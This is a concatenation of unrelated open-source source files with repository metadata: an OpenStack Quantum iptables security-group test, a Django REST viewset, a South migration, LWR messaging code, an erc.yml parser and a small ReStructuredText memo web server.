-A %(bn)s-i_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port1 -j %(bn)s-o_port1
-A %(bn)s-o_port1 -m mac ! --mac-source 12:34:56:78:9a:bc -j DROP
-A %(bn)s-o_port1 -p icmpv6 -j RETURN
-A %(bn)s-o_port1 -m state --state INVALID -j DROP
-A %(bn)s-o_port1 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port1 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-INGRESS tap_port2 -j %(bn)s-i_port2
-A %(bn)s-i_port2 -m state --state INVALID -j DROP
-A %(bn)s-i_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-i_port2 -j %(bn)s-sg-fallback
-A %(bn)s-FORWARD %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-sg-chain
-A %(bn)s-sg-chain %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-INPUT %(physdev)s --physdev-EGRESS tap_port2 -j %(bn)s-o_port2
-A %(bn)s-o_port2 -m mac ! --mac-source 12:34:56:78:9a:bd -j DROP
-A %(bn)s-o_port2 -p icmpv6 -j RETURN
-A %(bn)s-o_port2 -m state --state INVALID -j DROP
-A %(bn)s-o_port2 -m state --state ESTABLISHED,RELATED -j RETURN
-A %(bn)s-o_port2 -j %(bn)s-sg-fallback
-A %(bn)s-sg-chain -j ACCEPT
""" % IPTABLES_ARG
IPTABLES_ARG['chains'] = CHAINS_EMPTY
IPTABLES_FILTER_V6_EMPTY = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-filter-top - [0:0]
-A FORWARD -j quantum-filter-top
-A OUTPUT -j quantum-filter-top
-A quantum-filter-top -j %(bn)s-local
-A INPUT -j %(bn)s-INPUT
-A OUTPUT -j %(bn)s-OUTPUT
-A FORWARD -j %(bn)s-FORWARD
-A %(bn)s-sg-fallback -j DROP
""" % IPTABLES_ARG
FIREWALL_BASE_PACKAGE = 'quantum.agent.linux.iptables_firewall.'
class TestSecurityGroupAgentWithIptables(unittest.TestCase):
FIREWALL_DRIVER = FIREWALL_BASE_PACKAGE + 'IptablesFirewallDriver'
PHYSDEV_INGRESS = 'physdev-out'
PHYSDEV_EGRESS = 'physdev-in'
def setUp(self):
self.mox = mox.Mox()
agent_opts = [
cfg.StrOpt('root_helper', default='sudo'),
]
cfg.CONF.register_opts(agent_opts, "AGENT")
cfg.CONF.set_override(
'firewall_driver',
self.FIREWALL_DRIVER,
group='SECURITYGROUP')
self.addCleanup(mock.patch.stopall)
self.addCleanup(self.mox.UnsetStubs)
self.agent = sg_rpc.SecurityGroupAgentRpcMixin()
self.agent.context = None
self.root_helper = 'sudo'
self.agent.root_helper = 'sudo'
self.agent.init_firewall()
self.iptables = self.agent.firewall.iptables
self.mox.StubOutWithMock(self.iptables, "execute")
self.rpc = mock.Mock()
self.agent.plugin_rpc = self.rpc
rule1 = [{'direction': 'ingress',
'protocol': 'udp',
'ethertype': 'IPv4',
'source_ip_prefix': '10.0.0.2',
'source_port_range_min': 67,
'source_port_range_max': 67,
'port_range_min': 68,
'port_range_max': 68},
{'direction': 'ingress',
'protocol': 'tcp',
'ethertype': 'IPv4',
'port_range_min': 22,
'port_range_max': 22},
{'direction': 'egress',
'ethertype': 'IPv4'}]
rule2 = rule1[:]
rule2 += [{'direction': 'ingress',
'source_ip_prefix': '10.0.0.4',
'ethertype': 'IPv4'}]
rule3 = rule2[:]
rule3 += [{'direction': 'ingress',
'protocol': 'icmp',
'ethertype': 'IPv4'}]
rule4 = rule1[:]
rule4 += [{'direction': 'ingress',
'source_ip_prefix': '10.0.0.3',
'ethertype': 'IPv4'}]
rule5 = rule4[:]
rule5 += [{'direction': 'ingress',
'protocol': 'icmp',
'ethertype': 'IPv4'}]
self.devices1 = {'tap_port1': self._device('tap_port1',
'10.0.0.3',
'12:34:56:78:9a:bc',
rule1)}
self.devices2 = {'tap_port1': self._device('tap_port1',
'10.0.0.3',
'12:34:56:78:9a:bc',
rule2),
'tap_port2': self._device('tap_port2',
'10.0.0.4',
'12:34:56:78:9a:bd',
rule4)}
self.devices3 = {'tap_port1': self._device('tap_port1',
'10.0.0.3',
'12:34:56:78:9a:bc',
rule3),
'tap_port2': self._device('tap_port2',
'10.0.0.4',
'12:34:56:78:9a:bd',
rule5)}
def _device(self, device, ip, mac_address, rule):
return {'device': device,
'fixed_ips': [ip],
'mac_address': mac_address,
'security_groups': ['security_group1'],
'security_group_rules': rule,
'security_group_source_groups': [
'security_group1']}
def _regex(self, value):
value = value.replace('physdev-INGRESS', self.PHYSDEV_INGRESS)
value = value.replace('physdev-EGRESS', self.PHYSDEV_EGRESS)
value = value.replace('\n', '\\n')
        value = value.replace('[', r'\[')
        value = value.replace(']', r'\]')
return mox.Regex(value)
def _replay_iptables(self, v4_filter, v6_filter):
self.iptables.execute(
['iptables-save', '-t', 'filter'],
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['iptables-restore'],
process_input=self._regex(v4_filter),
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['iptables-save', '-t', 'nat'],
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['iptables-restore'],
process_input=self._regex(IPTABLES_NAT),
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['ip6tables-save', '-t', 'filter'],
root_helper=self.root_helper).AndReturn('')
self.iptables.execute(
['ip6tables-restore'],
process_input=self._regex(v6_filter),
root_helper=self.root_helper).AndReturn('')
def test_prepare_remove_port(self):
self.rpc.security_group_rules_for_devices.return_value = self.devices1
self._replay_iptables(IPTABLES_FILTER_1, IPTABLES_FILTER_V6_1)
self._replay_iptables(IPTABLES_FILTER_EMPTY, IPTABLES_FILTER_V6_EMPTY)
self.mox.ReplayAll()
self.agent.prepare_devices_filter(['tap_port1'])
self.agent.remove_devices_filter(['tap_port1'])
self.mox.VerifyAll()
def test_security_group_member_updated(self):
self.rpc.security_group_rules_for_devices.return_value = self.devices1
self._replay_iptables(IPTABLES_FILTER_1, IPTABLES_FILTER_V6_1)
self._replay_iptables(IPTABLES_FILTER_1_2, IPTABLES_FILTER_V6_1)
self._replay_iptables(IPTABLES_FILTER_2, IPTABLES_FILTER_V6_2)
self._replay_iptables(IPTABLES_FILTER_2_2, IPTABLES_FILTER_V6_2)
self._replay_iptables(IPTABLES_FILTER_1, IPTABLES_FILTER_V6_1)
self._replay_iptables(IPTABLES_FILTER_EMPTY, IPTABLES_FILTER_V6_EMPTY)
self.mox.ReplayAll()
self.agent.prepare_devices_filter(['tap_port1'])
self.rpc.security_group_rules_for_devices.return_value = self.devices2
self.agent.security_groups_member_updated(['security_group1'])
self.agent.prepare_devices_filter(['tap_port2'])
self.rpc.security_group_rules_for_devices.return_value = self.devices1
self.agent.security_groups_member_updated(['security_group1'])
self.agent.remove_devices_filter(['tap_port2'])
self.agent.remove_devices_filter(['tap_port1'])
self.mox.VerifyAll()
    def test_security_group_rule_updated(self):
self.rpc.security_group_rules_for_devices.return_value = self.devices2
self._replay_iptables(IPTABLES_FILTER_2, IPTABLES_FILTER_V6_2)
self._replay_iptables(IPTABLES_FILTER_2_3, IPTABLES_FILTER_V6_2)
self.mox.ReplayAll()
self.agent.prepare_devices_filter(['tap_port1', 'tap_port3'])
self.rpc.security_group_rules_for_devices.return_value = self.devices3
self.agent.security_groups_rule_updated(['security_group1'])
self.mox.VerifyAll()
class SGNotificationTestMixin():
def test_security_group_rule_updated(self):
name = 'webservers'
description = 'my webservers'
with self.security_group(name, description) as sg:
with self.security_group(name, description) as sg2:
security_group_id = sg['security_group']['id']
direction = "ingress"
source_group_id = sg2['security_group']['id']
protocol = 'tcp'
port_range_min = 88
port_range_max = 88
with self.security_group_rule(security_group_id, direction,
protocol, port_range_min,
port_range_max,
source_group_id=source_group_id
):
pass
self.notifier.assert_has_calls(
[call.security_groups_rule_updated(mock.ANY,
[security_group_id]),
call.security_groups_rule_updated(mock.ANY,
[security_group_id])])
def test_security_group_member_updated(self):
with self.network() as n:
with self.subnet(n):
with self.security_group() as sg:
security_group_id = sg['security_group']['id']
res = self._create_port(self.fmt, n['network']['id'])
port = self.deserialize(self.fmt, res)
data = {'port': {'fixed_ips': port['port']['fixed_ips'],
'name': port['port']['name'],
ext_sg.SECURITYGROUPS:
[security_group_id]}}
req = self.new_update_request('ports', data,
port['port']['id'])
res = self.deserialize(self.fmt,
req.get_response(self.api))
self.assertEquals(res['port'][ext_sg.SECURITYGROUPS][0],
security_group_id)
self._delete('ports', port['port']['id'])
self.notifier.assert_has_calls(
[call.security_groups_member_updated(
mock.ANY, [mock.ANY]),
call.security_groups_member_updated(
mock.ANY, [security_group_id])])
class TestSecurityGroupAgentWithOVSIptables(
TestSecurityGroupAgentWithIptables):
FIREWALL_DRIVER = FIREWALL_BASE_PACKAGE + 'OVSHybridIptablesFirewallDriver'
def _regex(self, value):
#Note(nati): tap is prefixed on the device
# in the OVSHybridIptablesFirewallDriver
value = value.replace('tap_port', 'taptap_port')
value = value.replace('o_port', 'otap_port')
value = value.replace('i_port', 'itap_port')
return super(
TestSecurityGroupAgentWithOVSIptables,
self)._regex(value)
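    # Descriptive note on the override above: the OVS hybrid firewall driver
    # derives chain and physdev names by prefixing the device name, so a
    # template fragment such as "-A %(bn)s-i_port1" must be rewritten to match
    # the generated "itap_port1"/"otap_port1" chains and the "taptap_port1"
    # tap device.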
| apache-2.0 | -953,503,682,981,960,700 | 43.724809 | 79 | 0.53262 | false | 3.154563 | true | false | false |
sehgalayush1/RestAPIDjango | snippets/views.py | 1 | 1253 | from snippets.models import Snippet
from snippets.serializers import SnippetSerializer, UserSerializer
from django.contrib.auth.models import User
from rest_framework import permissions, renderers
from snippets.permissions import IsOwnerOrReadOnly
from rest_framework.decorators import api_view, detail_route
from rest_framework.response import Response
from rest_framework.reverse import reverse
from rest_framework import viewsets
@api_view(['GET'])
def api_root(request, format=None):
return Response({
'users': reverse('user-list', request=request, format=format),
'snippets': reverse('snippet-list', request=request, format=format),
})
class UserViewSet(viewsets.ReadOnlyModelViewSet):
queryset = User.objects.all()
serializer_class = UserSerializer
class SnippetViewSet(viewsets.ModelViewSet):
queryset = Snippet.objects.all()
serializer_class = SnippetSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly,)
@detail_route(renderer_classes=[renderers.StaticHTMLRenderer])
def highlight(self, request, *args, **kwargs):
snippet = self.get_object()
return Response(snippet.highlighted)
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
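# Illustrative URL wiring for the viewsets above (assumed urls.py content, not
# part of this file):
#
#   from rest_framework.routers import DefaultRouter
#   router = DefaultRouter()
#   router.register(r'snippets', SnippetViewSet)
#   router.register(r'users', UserViewSet)
#   urlpatterns = router.urls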
| gpl-3.0 | -8,928,990,795,269,132,000 | 31.973684 | 81 | 0.787709 | false | 3.903427 | false | false | false |
universalcore/unicore-mc | unicoremc/migrations/0021_auto__del_field_project_repo_url__del_field_project_base_repo_url__del.py | 1 | 8224 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Project.repo_url'
db.delete_column(u'unicoremc_project', 'repo_url')
# Deleting field 'Project.base_repo_url'
db.delete_column(u'unicoremc_project', 'base_repo_url')
# Deleting field 'Project.repo_git_url'
db.delete_column(u'unicoremc_project', 'repo_git_url')
def backwards(self, orm):
# Adding field 'Project.repo_url'
db.add_column(u'unicoremc_project', 'repo_url',
self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True),
keep_default=False)
# Adding field 'Project.base_repo_url'
db.add_column(u'unicoremc_project', 'base_repo_url',
self.gf('django.db.models.fields.URLField')(default='', max_length=200),
keep_default=False)
# Adding field 'Project.repo_git_url'
db.add_column(u'unicoremc_project', 'repo_git_url',
self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True),
keep_default=False)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'unicoremc.apptype': {
'Meta': {'ordering': "('title',)", 'object_name': 'AppType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'project_type': ('django.db.models.fields.CharField', [], {'default': "'unicore-cms'", 'max_length': '256'}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'unicoremc.localisation': {
'Meta': {'ordering': "('language_code',)", 'object_name': 'Localisation'},
'country_code': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language_code': ('django.db.models.fields.CharField', [], {'max_length': '3'})
},
u'unicoremc.project': {
'Meta': {'ordering': "('application_type__title', 'country')", 'object_name': 'Project'},
'application_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['unicoremc.AppType']", 'null': 'True', 'blank': 'True'}),
'available_languages': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['unicoremc.Localisation']", 'null': 'True', 'blank': 'True'}),
'cms_custom_domain': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'default_language': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'default_language'", 'null': 'True', 'to': u"orm['unicoremc.Localisation']"}),
'external_repos': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'external_projects'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['unicoremc.ProjectRepo']"}),
'frontend_custom_domain': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'ga_account_id': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'ga_profile_id': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hub_app_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'project_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'initial'", 'max_length': '50'}),
'team_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
u'unicoremc.projectrepo': {
'Meta': {'object_name': 'ProjectRepo'},
'base_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'git_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'project': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'repo'", 'unique': 'True', 'primary_key': 'True', 'to': u"orm['unicoremc.Project']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['unicoremc'] | bsd-2-clause | 2,015,478,026,492,564,700 | 70.521739 | 223 | 0.559703 | false | 3.589699 | false | false | false |
jmchilton/lwr | lwr/messaging/__init__.py | 1 | 1079 | """ This module contains the server-side only code for interfacing with
message queues. Code shared between client and server can be found in
submodules of ``lwr.lwr_client``.
:mod:`lwr.messaging.bind_amqp` Module
-------------------------------------
.. automodule:: lwr.messaging.bind_amqp
:members:
:undoc-members:
:show-inheritance:
"""
from ..messaging import bind_amqp
from six import itervalues
def bind_app(app, queue_id, connect_ssl=None):
connection_string = __id_to_connection_string(app, queue_id)
queue_state = QueueState()
for manager in itervalues(app.managers):
bind_amqp.bind_manager_to_queue(manager, queue_state, connection_string, connect_ssl)
return queue_state
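# Typical use (sketch): keep the returned QueueState and deactivate it on
# shutdown so the bound consumer loops can exit.
#
#   queue_state = bind_app(app, queue_id)
#   ...
#   queue_state.deactivate()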
class QueueState(object):
""" Passed through to event loops, should be "non-zero" while queues should
be active.
"""
def __init__(self):
self.active = True
def deactivate(self):
self.active = False
def __nonzero__(self):
return self.active
def __id_to_connection_string(app, queue_id):
return queue_id
| apache-2.0 | 2,951,453,091,740,333,600 | 24.093023 | 93 | 0.665431 | false | 3.682594 | false | false | false |
o2r-project/o2r-meta | parsers/parse_erc_config.py | 1 | 4786 | """
Copyright (c) 2016, 2017 - o2r project
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__all__ = ['ParseErcConfig']
import os
import yaml
from helpers.helpers import *
ID = 'o2r erc configuration file (erc.yml) parser'
FORMATS = ['.yml']
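# A minimal erc.yml understood by this parser might look like (sketch; the
# values are placeholders, the keys are the ones handled below):
#
#   id: "12345-abcde"
#   spec_version: 1
#   main: main.Rmd
#   display: display.html
#   licenses:
#     code: Apache-2.0
#   convention: some-convention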
class ParseErcConfig:
@staticmethod
def get_id():
return str(ID)
@staticmethod
def get_formats():
return FORMATS
@staticmethod
def parse(**kwargs):
is_debug = False
try:
path_file = kwargs.get('p', None)
MASTER_MD_DICT = kwargs.get('md', None)
is_debug = kwargs.get('is_debug', None)
global erc_id
erc_id = None
global erc_spec_version
erc_spec_version = None
global basedir
basedir = kwargs.get('bd', None)
erc_config = yaml.load(open(path_file), Loader=yaml.FullLoader)
if erc_config is not None:
# id and spec_version:
if 'id' in erc_config:
if erc_config['id'] is not None:
MASTER_MD_DICT['id'] = erc_config['id']
erc_id = erc_config['id']
if 'spec_version' in erc_config:
if erc_config['spec_version'] is not None:
erc_spec_version = erc_config['spec_version']
status_note(['parsing ', path_file, ' for compendium ', erc_id,
' with version ', erc_spec_version, ' and basedir ', basedir, ' :\n',
str(erc_config)], d=is_debug)
# main and display file
if 'main' in erc_config:
if erc_config['main'] is not None:
if basedir:
# relative path handling happens outside of parser for main
# erc.yml paths are by definition relative to erc.yml
abs_path = os.path.abspath(os.path.join(os.path.dirname(path_file), erc_config['main']))
MASTER_MD_DICT['mainfile'] = abs_path
else:
MASTER_MD_DICT['mainfile'] = erc_config['main']
else:
status_note('warning: no main file in erc.yml', d=is_debug)
if 'display' in erc_config:
if erc_config['display'] is not None:
if basedir:
# relative path handling for displayfile
abs_path = os.path.abspath(os.path.join(os.path.dirname(path_file), erc_config['display']))
MASTER_MD_DICT['displayfile'] = os.path.relpath(abs_path, basedir)
else:
MASTER_MD_DICT['displayfile'] = erc_config['display']
else:
status_note('warning: no display file in erc.yml', d=is_debug)
# licenses:
if 'licenses' in erc_config:
if erc_config['licenses'] is not None:
MASTER_MD_DICT['license'] = erc_config['licenses']
# convention:
if 'convention' in erc_config:
if erc_config['convention'] is not None:
MASTER_MD_DICT['convention'] = erc_config['convention']
else:
status_note(['error parsing erc.yml from', str(path_file)], d=is_debug)
return MASTER_MD_DICT
except yaml.YAMLError as yexc:
if hasattr(yexc, 'problem_mark'):
if yexc.context is not None:
status_note(['yaml error\n\t', str(yexc.problem_mark), '\n\t', str(yexc.problem), ' ', str(yexc.context)], d=True)
return 'error'
else:
status_note(['yaml error\n\t', str(yexc.problem_mark), '\n\t', str(yexc.problem)],
d=is_debug)
return 'error'
else:
status_note(['! error: unable to parse yaml \n\t', str(yexc)], d=is_debug)
return 'error'
except Exception as exc:
status_note(str(exc), d=is_debug)
return 'error' | apache-2.0 | -5,145,742,858,696,219,000 | 39.91453 | 134 | 0.514626 | false | 4.158123 | true | false | false |
saiias/pymamemose | pymamemose/pymamemose.py | 1 | 12369 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import BaseHTTPServer as bts
import subprocess
import urlparse
import os
import json
import urllib2
import re
import codecs
HOME_DIR = os.environ["HOME"]
try:
SETTING=json.load(open(HOME_DIR+'/.pymamemose.json'))
except IOError,(errno,strerror):
    print "~/.pymamemose.json does not exist, using defaults"
SETTING={"DOCUMENT_ROOT":"~/Dropbox/memo","RECENT_NUM":5,"PORT":8000,"REST_PATTERN":".rst","IGNORE_FILE":""}
DOCUMENT_ROOT =os.path.expanduser(SETTING["DOCUMENT_ROOT"]) if SETTING.has_key("DOCUMENT_ROOT") else "~/Dropbox/memo"
RECENT_NUM =SETTING["RECENT_NUM"] if SETTING.has_key("RECENT_NUM") else 5
PORT = SETTING["PORT"] if SETTING.has_key("PORT") else 8000
REST_PATTERN =SETTING["REST_PATTERN"] if SETTING.has_key("REST_PATTERN") else ".rst"
IGNORE_FILE =SETTING["IGNORE_FILE"] if SETTING.has_key("IGNORE_FILE") else ""
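# Example ~/.pymamemose.json (all keys optional; the defaults above apply):
#
#   {"DOCUMENT_ROOT": "~/Dropbox/memo", "RECENT_NUM": 5, "PORT": 8000,
#    "REST_PATTERN": ".(rst|rest|txt)$", "IGNORE_FILE": "TAGS|.DS_Store"}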
class GetHandler(bts.BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/favicon.ico':
self.send_error(404)
else:
parsed_path = urlparse.urlparse(self.path)
self.send_response(200)
self.send_header("Content-type","text/html")
res = Pymamemose(parsed_path)
self.end_headers()
self.wfile.write(res.make_html())
return
class Pymamemose():
def __init__(self,parsed_path):
self.parsed_path=parsed_path
self.restpatobj =re.compile(REST_PATTERN)
self.ignoreobj = re.compile(IGNORE_FILE)
def make_html(self):
path = DOCUMENT_ROOT+self.parsed_path.path
query=urllib2.unquote(self.parsed_path.query)
if path == DOCUMENT_ROOT + "/search":
res = self.req_search(path,query)
elif os.path.isdir(path):
res = self.req_index(path,query)
elif os.path.isfile(path):
res = self.req_file(path,query)
        else:
            print "failure: %s not found" % path
            res = "<h1>404 Not Found: %s</h1>" % path
return res
def header_html(self,title,path,q=""):
html = """<!DOCTYPE HTML>
<html>
<head>
<meta charset="UTF-8">
<title> %s </title>
"""%(title)
html+="""
<style type="text/css">
<!--
body {
margin: auto;
padding: 0 2em;
max-width: 80%;
border-left: 1px solid black;
border-right: 1px solid black;
font-size: 100%;
line-height: 140%;
}
pre {
border: 1px solid #090909;
background-color: #f8f8f8;
padding: 0.5em;
margin: 0.5em 1em;
}
code {
border: 1px solid #cccccc;
background-color: #f8f8f8;
padding: 2px 0.5em;
margin: 0 0.5em;
}
a {
text-decoration: none;
}
a:link, a:visited, a:hover {
color: #4444cc;
}
a:hover {
text-decoration: underline;
}
h1, h2, h3 {
font-weight: bold;
color: #2f4f4f;
}
h1 {
font-size: 200%;
line-height: 100%;
margin: 1em 0;
border-bottom: 1px solid #2f4f4f;
}
h2 {
font-size: 175%;
line-height: 100%;
margin: 1em 0;
padding-left: 0.5em;
border-left: 0.5em solid #2f4f4f;
}
h3 {
font-size: 150%;
line-height: 100%;
margin: 1em 0;
}
h4, h5 {
font-weight: bold;
color: #000000;
margin: 1em 0 0.5em;
}
h4 { font-size: 125% }
h5 { font-size: 100% }
p {
margin: 0.7em 1em;
text-indent: 1em;
}
div.footnotes {
padding-top: 1em;
color: #090909;
}
div#header {
margin-top: 1em;
padding-bottom: 1em;
border-bottom: 1px dotted black;
}
div#header > form {
display: float;
float: right;
text-align: right;
}
a.filename {
color: #666666;
}
footer {
border-top: 1px dotted black;
padding: 0.5em;
font-size: 80%;
text-align: right;
margin: 5em 0 1em;
}
blockquote {
margin: 1em 3em;
border: 2px solid #999;
padding: 0.3em 0;
background-color: #f3fff3;
}
hr {
height: 1px;
border: none;
border-top: 1px solid black;
}
table {
padding: 0;
margin: 1em 2em;
border-spacing: 0;
border-collapse: collapse;
}
table tr {
border-top: 1px solid #cccccc;
background-color: white;
margin: 0;
padding: 0;
}
table tr:nth-child(2n) {
background-color: #f8f8f8;
}
table tr th {
font-weight: bold;
border: 1px solid #cccccc;
text-align: left;
margin: 0;
padding: 6px 13px;
}
table tr td {
border: 1px solid #cccccc;
text-align: left;
margin: 0;
padding: 6px 13px;
}
table tr th :first-child, table tr td :first-child {
margin-top: 0;
}
table tr th :last-child, table tr td :last-child {
margin-bottom: 0;
}
-->
</style>
<script>
function copy(text) {
prompt("Copy filepath below:", text);
}
</script>
</head>
<body>
"""
link_str=""
uri = ""
fp =path.replace(DOCUMENT_ROOT,'').split('/')
for i in fp:
if i ==u'':
continue
uri +='/'+i
if os.path.isfile(DOCUMENT_ROOT+uri) or os.path.isdir(DOCUMENT_ROOT+uri):
link_str += '/' + "<a href='%s'>%s</a>"%(uri,i)
link_str += "<a class='filename' href=\"javascript:copy('%s');\">[copy]</a>"%(path)
link_str = "<a href='/'>%s</a>"%(DOCUMENT_ROOT) + link_str
search="""
<form action="/search" method="get",accept-charset="UTF-8">
<input name="path" type="hidden" value="" />
<input name="q" type="text" value="" size="24" />
<input type="submit" value="search" />
</form>
"""
return html+"<div id=\"header\">%s %s</div>"%(link_str,search)
def footer_html(self):
html ="""
<footer>
<a href="https://github.com/saiias/pymamemose">pymamemose: ReStructuredText memo server</a>
</footer>
</body>
</html>
"""
return html
def req_search(self,path,query):
query=query.split("&q=")[1]
found = self.find(path,query)
html_title = "Serch in "+path
title = "</div><h1>Seach in %s </h1>"%(path)
body =""
if query == "":
body+="<h2>No Keyword </h2>"
elif len(found)==0:
body+="<h2>Not Found</h2>"
elif len(found)>0:
body +='<ul>'
for k,v in found.items():
                size = float(getFileSize(v)) / 1024
v=v.replace(DOCUMENT_ROOT+'/','')
body +='''
<li><a href="%s">%s</a>
<a class='filename' href="javascript:copy('%s');\">[%s , %.1f KB]</a></li>
'''%(v,k,v,k,size)
body +='<ul>'
body = title+body
header_html = self.header_html(html_title,path,query)
footer_html = self.footer_html()
return header_html+body+footer_html
def req_file(self,req,res):
"""
        Called when the accessed path points to a file.
        If the file is in ReST format it is converted with rst2html and the
        resulting HTML is returned.
        req: the accessed path
        res: the query string
"""
header_html = self.header_html(req,req)
footer_html = self.footer_html()
body = ""
if isMatchedFile(self.restpatobj,os.path.splitext(req)[1]):
body +=subprocess.check_output(['rst2html.py',req])
body=body.split('<body>')[1]
body=body.split('</body>')[0]
else:
"""
            Behavior for non-ReST files.
"""
f=open(req,'r')
body += f.read()
f.close()
return header_html.encode('ascii')+body+footer_html.encode('ascii')
def req_index(self,req,res):
"""
        Called when the accessed path points to a directory.
        Classifies the directory contents into sub-directories, ReST files
        and other files, and returns the rendered HTML.
        req: the accessed path
        res: the query string
"""
global RECENT_NUM
dirs,rest,others=self.directory_files(req)
body = "</div><h1>Index of %s </h1>"%(req)
if RECENT_NUM > 0:
body += "<h2>Recent:</h2>"
recent = self.recent_files()
if len(recent) < RECENT_NUM:
RECENT_NUM = len(recent)
